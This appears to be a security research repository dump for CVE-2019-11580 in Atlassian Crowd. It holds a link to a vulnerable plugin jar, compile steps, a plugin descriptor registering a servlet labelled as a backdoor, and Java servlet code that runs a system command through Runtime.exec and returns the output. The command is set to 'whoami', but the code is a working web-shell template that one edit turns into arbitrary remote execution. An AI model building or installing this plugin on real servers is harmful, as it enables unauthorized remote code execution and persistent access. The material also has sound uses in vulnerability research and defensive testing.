├── CVE-2019-11580
    ├── applinks-plugin-5.2.6.jar
    └── atlassian-shell
    │   ├── README.md
    │   ├── atlassian-plugin.xml
    │   └── com
    │       └── cdl
    │           └── shell
    │               └── Cdl.java
└── README.md


/CVE-2019-11580/applinks-plugin-5.2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lc/research/795634735d38264e65cb401aba631f8668d0b6f0/CVE-2019-11580/applinks-plugin-5.2.6.jar


--------------------------------------------------------------------------------
/CVE-2019-11580/atlassian-shell/README.md:
--------------------------------------------------------------------------------
 1 | ## atlassian-shell
 2 | A malicious plugin to execute code on Atlassian applications; by default this only executes `whoami`, so people don't just throw up cmd shell's everywhere.
 3 | 
 4 | ## compile:
 5 | ```
 6 | javac -cp apache-tomcat/lib/servlet-api.jar com/cdl/shell/Cdl.java
 7 | zip -r rce.jar atlassian-plugin.xml ./com
 8 | ```
 9 | 
10 | After installing, it will be available at: `/plugins/servlet/cdl`
11 | 
12 | 
13 | ## Note:
14 | You'll need the the Java SDK, please ensure your version is [supported](https://confluence.atlassian.com/crowd/supported-platforms-191851.html)
15 | 
16 | This was built / tested with javac v1.8
17 | 
18 | 


--------------------------------------------------------------------------------
/CVE-2019-11580/atlassian-shell/atlassian-plugin.xml:
--------------------------------------------------------------------------------
 1 | <atlassian-plugin key="com.cdl.shell.Cdl" name="cdl" plugins-version="2" class="com.cdl.shell.Cdl">
 2 |     <plugin-info>
 3 |         <param name="atlassian-data-center-compatible">true</param>
 4 |         <description></description>
 5 |         <version>1.0.0</version>
 6 |     </plugin-info>
 7 | 
 8 | 	<servlet name="exploit" key="exploit" class="com.cdl.shell.Cdl">
 9 | 	   <url-pattern>/cdl</url-pattern>
10 | 	   <description>backdoor at /plugins/servlet/cdl</description>
11 | 	</servlet>
12 | 
13 | </atlassian-plugin>
14 | 


--------------------------------------------------------------------------------
/CVE-2019-11580/atlassian-shell/com/cdl/shell/Cdl.java:
--------------------------------------------------------------------------------
 1 | package com.cdl.shell;
 2 | 
 3 | import javax.servlet.http.*;
 4 | import java.io.InputStream;
 5 | 
 6 | public class Cdl extends javax.servlet.http.HttpServlet {
 7 | 
 8 | 	public void doGet(HttpServletRequest req, HttpServletResponse res) {
 9 | 	   try {
10 | 		String cmd="whoami";
11 | 		String output="";
12 | 		try {
13 | 			if (!cmd.equals("")) {
14 | 				Process p=Runtime.getRuntime().exec(cmd);
15 | 				InputStream out=p.getInputStream();
16 | 				InputStream err=p.getErrorStream();
17 | 				int c='\0';
18 |         		while ((c=out.read()) != -1) {
19 | 					res.getWriter().write((char)c);
20 | 				}
21 | 			}
22 | 		} catch(Exception ex) {
23 | 			output+="\n"+ex.toString();
24 | 		}	
25 | 	} catch(Exception e) {
26 | 		e.printStackTrace();
27 | 	   }
28 | 	}
29 | 
30 | }
31 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # research
2 | miscellaneous security research stuff 
3 | 


--------------------------------------------------------------------------------